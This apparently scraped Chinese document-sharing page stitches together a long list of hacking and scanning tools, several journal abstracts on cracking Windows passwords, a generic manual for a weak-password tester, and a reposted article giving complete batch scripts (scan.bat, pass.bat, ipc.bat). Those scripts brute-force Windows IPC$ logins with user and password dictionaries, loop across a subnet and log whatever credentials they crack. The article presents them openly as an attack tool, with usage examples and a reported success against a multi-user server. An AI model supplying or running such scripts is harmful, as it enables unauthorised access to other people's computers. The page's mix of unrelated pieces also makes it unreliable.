sp2漏洞利用工具webhacking-WEB渗透超级助手简洁高速的扫描器:HScanBBS论坛群发机破解版mssql注射辅助工具-getwebsehll软件名称超级扫描器nmap-4.00挖掘鸡V2.2啊D注入工具V2.32 免杀版SQL注射综合程序扫描器IPtools2.5破解版SSPort高速端口扫描器V1.0局域网查看工具V1.60NCPH影子扫描器目前最完美的注入工具IP物理地址探测器网站猎手网络端口扫描工具震荡波扫描工具:Sasser Scanner MS04-011漏洞扫描器RetinaSasserSQL跨库查询动画教程命令行下NohackerScanner扫描器IP扫描IPScanner 1.79中文破解版嗅探监听:局域网密码查看工具1.46经典工具:X-Scan-v3.1监听工具:PromiScan v3.0扫描工具:FtpList 1.13经典漏洞扫描:X-Scan v3.0扫描工具:Remoxec数据扫描工具:Oracle Auditing ToolsWeb漏洞扫描工具Trapserver著名的漏洞扫描:SSS扫描工具:RpcScan v1.1.1经典的扫描工具:nmap 3.50漏洞扫描:GFI LANguard Scanner小巧的IPC扫描工具CC6.0扫描程序nmap 3.75 for winrootkit扫描工具:Rkdscan动画教程:JOEKOE留言本漏洞NBWS网站后台路径猜测工具web路径猜解工具:ScanWebPath未公布的动力系统漏洞演示SQL扫描工具:SQL pingIIS权限探测:IIS Write Scanner V1.0扫描软件SImpsons'CGI Scanner及使用教程LANguard Network Security Scanner 5.0 加密工具:Morphine v1.3+GUIDFind v0.8L-ScanPort2.0扫描工具:ScannerX-Scan-v3.1-cnAdvanced IP Scanner V1.4 汉化版飞狐-网络扫描工具试用版Linux/UNIX扫描软件:XTHC-Amap v4.6 动画教程:动力破解任何收费漏洞动画教程:'or''='漏洞最新演示天意阿里巴巴企业商务网V3.7上传漏洞代理猎手获取ADSL帐号冲Q币扫描器:nessuswx-1.4.4-installIP扫描软件:Angry IP Scanner端口/漏洞/组件扫描工具:DFind v0.6可获取Web Server类型的端口扫描器135端口扫描器RpcScan v1.2.14899空口令探测器经典工具:namp v3.50 命令行版猜解后台路径工具流光5.0黑客基地专用破解版免验证版NBSI(附加扫描器)U-scan(UNICODE漏洞扫描器)自定义多线程后台扫描程序:ScanLogin75款全球强劲工具大集合之一Nessus75款全球强劲工具大集合之二NessusWX Accessdiver 汉化版+使用教程优秀的X-way75款全球强劲工具大集合之十八SuperScan 75款全球强劲工具大集合之十六Nikto75款全球强劲工具大集合之十一Libwhisker 75款全球强劲工具大集合之十二JOHN16 75款全球强劲工具大集合之十二John75款全球强劲工具大集合之十三SSH75款全球强劲工具大集合之十五Tripwire最快的端口扫描工具高速端口扫描PortScanner源代码ScanMs ToolPHP扫描器。

用批处理命令也能当“黑客”——自编批处理破解弱口令

用批处理命令也能当“黑客”——自编批处理破解弱口令

用批处理命令也能当“黑客”——自编批处理破解弱口令郑志勇
【期刊名称】《电脑迷》
【年(卷),期】2003(000)011
【摘要】“弱口令”是指网络管理员或计算机的主人在使用Window操作系统时,忘记设置管理员口令或者是口令过于简单这一现象。

破解弱口令,很容易获得计算机的控制权。

一般来说,扫描弱口令都需要一定的网络知识和专门工具,要用批处理来获得对方电脑的控制权似乎有点天方夜谭,事实真的如此吗?我们先来看看这个批处理文件的真面目: @echo off echo格式:test*.*.*&gt;test.txt for/L (?)G in(1 1 254)do echo (?)1. (?)G&gt;&gt;test. txt&net use\\(?)1. (?)G\ipcS""/use:"Administrator" | find"命令成功完成"&gt;&gt;test. txt 将上面的这段程序保存到一个批处理文件中(如test.bat),执行该批处理文件就能自动扫描同一个C类网段内的所有机器是否包含有管理员空口令的机
【总页数】2页(P73-74)
【作者】郑志勇
【作者单位】
【正文语种】中文
【中图分类】TP316
【相关文献】
1.内话系统日志分析及批处理命令的应用 [J], 李云飞;
2.BAT脚本批处理命令在无人机影像制作中的应用 [J], 于丹盈
3.借助Excel与Windows批处理命令管理音频资料 [J], 饶可
4.DOS批处理命令在河南黄河工程资料管理中的应用 [J], 庄晓瑞;刘璐
5.再谈用批处理命令也能当黑客 [J], 乔珊
因版权原因,仅展示原文概要,查看原文内容请购买。

超级弱口令工具使用手册

超级弱口令工具使用手册

超级弱口令工具使用手册一、产品概述超级弱口令工具是一款专门用于测试网络安全的工具,主要用于发现系统中存在的弱口令情况,从而预防恶意攻击和数据泄露。

本工具可以通过自定义规则和字典进行弱口令检测,快速找出系统中存在的风险,提高系统安全性。

二、安装与配置1. 下载安装包用户可以在官方网站上下载最新版本的安装包,根据操作系统选择相应的版本进行下载。

2. 安装软件下载完成后,双击安装包进行安装,按照提示进行安装步骤即可完成安装过程。

3. 配置软件安装完成后,打开软件,根据需要进行相应的配置,包括选择字典、设置检测规则、配置扫描目标等。

三、基本功能介绍1. 字典设置用户可以在软件中导入自定义字典,也可以选择系统默认提供的字典用于进行弱口令检测。

字典的好坏直接影响着检测的准确性和速度,用户需要根据实际情况选择合适的字典。

2. 规则设置用户可以根据实际需求设置不同的弱口令检测规则,例如密码长度、字符组成、特殊字符等,以便更精准地进行弱口令的检测。

3. 扫描目标设置用户可以选择要进行弱口令检测的目标,可以是单个IP、IP范围、特定域名等,增加了工具的灵活性和适用范围。

4. 扫描结果软件将会返回检测到的弱口令信息,包括账号密码、检测结果等,用户可以根据结果进行进一步的处理和修复。

四、使用方法1. 打开软件安装完成后,双击桌面图标或者在开始菜单中打开软件。

2. 设置字典点击“设置”选项,选择“字典设置”,可以选择导入自定义字典,也可以使用系统默认字典。

3. 设置规则点击“设置”选项,选择“规则设置”,根据实际需求设置检测规则,例如密码长度、字符组成等。

4. 设置扫描目标在软件中选择“扫描目标”,可以输入单个IP或者IP范围等,也可以选择域名进行扫描。

5. 启动扫描配置完成后,点击“开始扫描”按钮,软件将开始对目标进行弱口令检测。

6. 查看结果等待扫描完成后,软件将返回检测到的弱口令信息,用户可以根据结果进行进一步的处理。

用CIA Commander破解Win2K/XP登录口令

用CIA Commander破解Win2K/XP登录口令

用CIA Commander破解Win2K/XP登录口令
钱镜辉
【期刊名称】《电脑自做》
【年(卷),期】2004(000)002
【摘要】忘记了Win2000/XP登录口令,对太多数用户来说是件今人头痛的事情。

有关破解Win2000/XP登录口令的方法大致如下:用LC4猜解WinNT/2000/XP登陆密码费时耗力.O&OBlueCon和NtPassWd则对Win XP SPI无能为力.ERD2003需在WinXP内核下才能运行:今天笔者将向大家介绍利用一张软盘轻松破解Win NT/2000/XP登录口令方法。

【总页数】1页(P97)
【作者】钱镜辉
【作者单位】无
【正文语种】中文
【中图分类】TP316.7
【相关文献】
1.Access XP口令的破解 [J], 何永太
2.WindowsXP登录口令遗忘后的应急处理 [J], 希宇
3.强制破解Windows XP登录密码 [J], 张景柱
4.动态字典破解用户口令与安全口令选择 [J], 张学旺; 孟磊; 周印
5.Windows XP破解登录两招 [J], 施旭
因版权原因,仅展示原文概要,查看原文内容请购买。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

(转)Win2k命令行下自做弱口令扫描器.txt @echo offecho 格式:test *.*.*>test.txtfor /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%Gipc$ ""/use:"Administrator" | find "命令成功完成" >>test.txt这个批处理文件的功能是对你指定的一个C类网段中的254个ip依次试建立帐号为administrator口令为空的ipc$连接,如果成功就把结果记录在test.txt。

短短173字节,就实现了弱口令扫描的功能!惊叹web_wolf思维之独到并感慨吾等菜鸟何日能成正果之时,不禁也有所悟:win2k命令行命令也可以用来远程破解NT弱口令!我们知道,在win2k命令行下有个for命令,其功能是对一组文件中的每一个文件执行某个特定命令,也就是可以用你指定的循环范围生成一系列命令。

For命令的格式为:FOR %variable IN (set) DO command [command-parameters]当然,for命令最强大的功能,表现在它的一些高级应用中。

譬如可以用 /r 参数遍历整个目录树;可以用 /f 参数将文本文件内容作为循环范围;可以用 /f 参数将某一命令执行结果作为循环范围等等。

在这里我不一一说明其用法,如果你不熟悉for命令,可以参考相关资料教程。

For命令应用最简单的例子,就是人工指定循环范围,然后对每个值执行指定的命令如果我们把密码做为循环值,把net use命令作为指定命令。

那将会产生什么样的效果呢?请看下面的命令:for /l %i in (100,1,999) do net use \ipipc$ "%i" /user: "username"解释一下:username是你用nbtstat得到的用户名,这条命令的功能是对指定username进行3位数纯数字密码依次尝试建立ipc连接,直到建立成功或者数字全部试完。

如果你网速够快的话,跑完这900个数字也需要多长时间。

也许你想到了,如果对方密码不是纯数字怎么办?有办法!我们还可以用字典,上面不是提到了可以用 /f 参数将文本文件内容作为循环范围吗?for /f %i in (pass.txt) do net use \ipipc$ "%i" /user:"username"pass.txt是字典文件,其格式为一个密码占一行。

例如:123123412345abcabcd这条命令的功能是对指定帐号username用密码字典pass.txt中的密码依次尝试建立ipc连接,直到建立成功或者密码全部试完。

可问题还是有,虽然这样我们碰巧是能连接成功,可我们仍然不知道密码啊,下次要用还得重新全部试过。

我们应该想办法把尝试成功的用户名和密码保存在指定文件才行啊!以下是我实验后的结果,也许不是什么好方法,但是完全可以实现对指定ip扫描并且把结果保存在指定文件。

由于我们现在要实现的功能不是一句命令所能完成的,所以我们把所有命令写成批处理文件。

先提醒一下,在批处理文件中使用 FOR 命令时,指定变量使用 %%variable,而不是%variable。

将下面内容存为scan.bat:@echo offecho Written By ypy >>%4echo Email:ypy_811@ >>%4echo --------------------------------- >>%4date /t >>%4time /t >>%4echo ---- >>%4echo Result:>>%4start "scan…" /min cmd /c for /f %%i in (%2) do call ipc.bat %1 "%%i" %3 %4exit将下面内容存为ipc.bat:net use \%1ipc$ %2 /user:"%3"goto result%ERRORLEVEL%:result0echo Remote Server:%1 >>%4echo Username:%3 >>%4echo Password:%2 >>%4echo ---- >>%4net use \%1ipc$ /delexit:result2ipc.bat中的%ERRORLEVEL%表示取前一命令执行后的返回结果。

net use命令成功完成返回0,失败返回2。

将scan.bat和ipc.bat存放于system32目录中,用法如下:scan.bat 主机密码字典文件用户名结果存放文件例如:scan.bat 192.168.35.17 d:pass.txt administrator d:esult.txt密码破解出来之后,存放于d:esult.txt里面。

我稍微解释一下扫描的原理,就是对帐号administrator用密码字典pass.txt中的密码依次尝试建立ipc连接,如果成功,则记录密码,不成功则试下一个密码。

可是细心的你肯定又发现问题了,这样只能指定用户名啊?如果我用nbtstat探测到了十几个用户,就需要打十几遍命令?既然我们可以从指定文件中循环取密码,那我们也可以从另一指定文件中循环取用户名啊,让我们再来修改一下:将下面内容存为scan.bat:@echo offecho --------------------------------- >>%4echo Written By ypy >>%4echo Email:ypy_811@ >>%4echo --------------------------------- >>%4date /t >>%4time /t >>%4echo Result:>>%4echo ---- >>%4start "scan..." /min cmd /c for /f %%i in (%3) do call pass.bat %1 %2 "%%i" %4 exit将下面内容存为pass.bat:start "scan..." /min cmd /c for /f %%i in (%2) do call ipc.bat %1 "%%i" %3 %4将下面内容存为ipc.bat:net use \%1ipc$ %2 /user:"%3"goto result%ERRORLEVEL%:result0echo Remote Server:%1 >>%4echo Username:%3 >>%4echo Password:%2 >>%4echo ---- >>%4net use \%1ipc$ /delexit:result2将scan.bat、pass.bat和 ipc.bat存放于system32目录中,用法如下:scan.bat 主机密码字典文件用户字典文件结果存放文件例如:scan.bat 192.168.35.17 d:pass.txt d:user.txt d:esult.txt其中用户字典文件user.txt的内容是你用nbtstat探测到的所有用户名,其格式和密码字典文件一样,一个字符串占一行。

例如:administratoradminypy这样扫描的原理是对用户字典user.txt中的每一个用户,同时用密码字典pass.txt中的密码依次尝试建立ipc连接,如果成功则记录用户名和密码,如果不成功就试下一个密码。

现在是不是有点对user.txt中的用户暴力跑ipc获得密码的味道啊?呵呵。

我用这个简单弱口令扫描器挂了一个xkey做的字典扫一台有八个用户的win2k server,还真扫出了两个密码!而且速度很快!好了,在Win2k命令行下简单做弱口令扫描器的方法就先介绍到这里,可能还有许多种更简单的方法能实现相同的功能,你可以去尝试一下。

事实上,当微软从win2k开始将命令行增强后,借鉴了相当多unix的优点,虽然还不至于像unix那么灵活,但可以实现的功能已相当之多。

写本文是希望起到介绍和抛砖引玉的效果。

所以没有实验更多功能,故给出几点说明:1.不能对指定网段扫描。

2.此扫描原理是用帐号和密码循环建立ipc$连接,因此如果对方没开139端口或者删除了ipc$共享,那就不能工作了,呵呵。

3.扫描方式是用户字典中的用户名同时在挂密码字典跑ipc,由于不允许一个用户使用一个以上用户名与一台服务器或共享资源多重连接,导致有的的帐号密码本应该真确的可返回的结果为失败,所以有时候会漏报。

但是如果你的字典中帐好和密码至少有一对正确的话,那至少能记录一对正确结果。

4.文中所有例子在win2k server和win xp上通过测试天生我材必有用,千金散尽还复来。

玉不琢,不成器;人不学,不知道。

相关文档
最新文档